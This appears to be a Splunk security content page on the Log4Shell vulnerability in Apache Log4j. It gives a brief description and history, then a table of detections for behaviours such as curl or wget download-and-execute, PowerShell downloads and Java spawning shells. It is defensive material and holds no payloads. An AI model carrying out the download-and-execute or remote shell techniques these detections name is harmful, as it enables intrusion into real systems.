Try in Splunk Security Cloud

Description

Log4Shell or CVE-2021-44228 is a Remote Code Execution (RCE) vulnerability in the Apache Log4j library, a widely used and ubiquitous logging framework for Java. The vulnerability allows an attacker who can control log messages to execute arbitrary code loaded from attacker-controlled servers and we anticipate that most apps using the Log4j library will meet this condition.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint, Network_Traffic, Risk, Web
  • Last Updated: 2021-12-11
  • Author: Jose Hernandez
  • ID: b4453928-5a98-11ec-afcd-8de10b48fc52

Narrative

In late November 2021, Chen Zhaojun of Alibaba identified a remote code execution vulnerability. Previous work was seen in a 2016 Blackhat talk by Alvaro Munoz and Oleksandr Mirosh called “A Journey from JNDI/LDAP Manipulation to Remote Code Execution Dream Land”. Reported under the CVE ID : CVE-2021-44228, released to the public on December 10, 2021. The vulnerability is exploited through improper deserialization of user input passed into the framework. It permits remote code execution and it can allow an attacker to leak sensitive data, such as environment variables, or execute malicious software on the target system.

Detections

Name Technique Type
Any Powershell DownloadFile Command and Scripting Interpreter, PowerShell, Ingress Tool Transfer TTP
CMD Carry Out String Command Parameter Windows Command Shell, Command and Scripting Interpreter Hunting
Curl Download and Bash Execution Ingress Tool Transfer TTP
Detect Outbound LDAP Traffic Exploit Public-Facing Application, Command and Scripting Interpreter Hunting
Hunting for Log4Shell Exploit Public-Facing Application, External Remote Services Hunting
Java Class File download by Java User Agent Exploit Public-Facing Application TTP
Linux Java Spawning Shell Exploit Public-Facing Application, External Remote Services TTP
Log4Shell CVE-2021-44228 Exploitation Ingress Tool Transfer, Exploit Public-Facing Application, Command and Scripting Interpreter, External Remote Services Correlation
Log4Shell JNDI Payload Injection Attempt Exploit Public-Facing Application, External Remote Services Anomaly
Log4Shell JNDI Payload Injection with Outbound Connection Exploit Public-Facing Application, External Remote Services Anomaly
Outbound Network Connection from Java Using Default Ports Exploit Public-Facing Application, External Remote Services TTP
PowerShell - Connect To Internet With Hidden Window PowerShell, Command and Scripting Interpreter Hunting
Wget Download and Bash Execution Ingress Tool Transfer TTP
Windows Java Spawning Shells Exploit Public-Facing Application, External Remote Services TTP
Windows Powershell Connect to Internet With Hidden Window Automated Exfiltration Anomaly
Windows Powershell DownloadFile Automated Exfiltration Anomaly

Reference

source | version: 1